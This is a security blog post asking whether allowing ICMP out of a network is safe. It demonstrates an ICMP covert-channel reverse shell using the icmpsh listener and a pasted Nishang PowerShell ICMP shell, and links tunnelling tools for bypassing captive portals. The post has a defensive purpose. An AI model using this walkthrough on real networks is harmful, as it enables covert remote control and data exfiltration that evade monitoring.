TL;DR

You can run a remote shell through ICMP. ICMP can be used for bad.

Many customers have asked me this question many times, and in general ICMP (ICMP is a lot more than just ping, but is often referred to as ping for simplicity) is a nice thing to use to verify if things on the network is responding, or to verify if you have an active internet connection. It is often also used to measure if links are reliable. My point is that from an IT Pro perspective there are many things we use ICMP for. The thing I want people to be aware of is that almost anything you allow out from your network can be misused for evil. In this post I will show you how an adversary can use ICMP to exfiltrate data and communicate with a client on the inside communicating only over ICMP.

The theory on using ICMP for evil is pretty straight forward and was written about as early as 1996. It came out in the PHRACK magazine (memory lane ) http://phrack.org/issues/49/1.html and referenced to as Project Loki.

The theory in using ICMP as a covert channel is that you have a server and a client side, and when they communicate they use the data portion of the ICMP_ECHO and the ICMP_ECHOREPLY. This meaning that data can be sent and received through the Data part of the ICMP packets.

I think this is cool. How many are looking at ICMP traffic at an analytic level? (I am making assumptions here)

ICMP is just one possible covert channel, it could for instance be DNS if the adversary preferred that. There are DNS covert channel projects out there (Google it). Every channel your network can use outwards towards Internet can most likely be used by an adversary as a covert channel. This blogpost however discusses ICMP.

Here is a quick demo with screenshots of how this works using the ICMPSH tool ported to Python by Bernardo Damele. The tool was originally made by Nico Leidecker – http://www.leidecker.info/

First on my attacker machine I turn of ICMP replies. Don’t want to mess up the Covert Channel sending junk…



Off command: sysctl -w net.ipv4.icmp_echo_ignore_all=1

On command: sysctl -w net.ipv4.icmp_echo_ignore_all=0

Then I need clone the ICMPSH github project to my attacker machine:



Git clone https://github.com/inquisb/icmpsh.git

First I start my server side using the python script within the ICMPSH project. I use this command:

Python icmpsh_m.py x.x.x.x y.y.y.y

Now the attacker machine will wait. Next we go to the client we want to control. There is an executable within the ICMPSH.git project that you can use on the windows clients, but I prefer to use Powershell. So in this walkthrough I use Nishang PowerShellICMP. The code can be found here (thanks Nikhil Mittal for awesome work):

https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1

Take the code and paste it into a Powershell window on the client. The Powershell does not need to be elevated and the user does not need to be a local administrator.



Then invoke the new defined function like this:

If you now go back to your attacker pc you will now have shell access over ICMP (just like magic):

The interesting part is looking at the traffic from the client. If I run Wireshark and filter out only the traffic from my VM I see this when I issue commands through the shell:



So, to answer the blogpost question, “Is ping okay?”, I would say you need to evaluate the risks in your environment. There is no answer that fits all situations. Of course, the hacker needs to get control of one host in order to use this method, but as I always say. Think of security as layers of defense. Don’t rely on only a few layers. Think ahead.

For example:

– What if the hacker gains access to a client?

— I have AppLocker to prevent execution of code

—What if the attacker bypasses AppLocker

—-Users don’t have local admin rights

—–What if the attacker gains local admin rights?

——The client computers cannot communicate with other client computers and data containing sensitive data are isolated.

Of course, preventing covert channels using ICMP/DNS etc. is a good idea in general. But often in modern networks today there are so many other ways of getting data in and out of a network, that using a ICMP tunnel is something the attackers often does not need to do.

Also worth mentioning that there are projects that can use ICMP as a way of proxying traffic out towards Internet. For instance some public wifi requires you to register before gaining full wifi access, but ICMP is often open before you authorize towards captive portals. Meaning that you can tunnel your traffic through an ICMP proxy and get free Internet.

Examples:

http://dries.eu/rpms/ptunnel/ptunnel

http://neophob.com/2007/10/pingtunnel-for-windows-icmp-tunnel/

( I have not tested these tools, and there are probably more tools like this if you search for them)

I hope this post illustrated that innocent things like ping can be used for evil as well.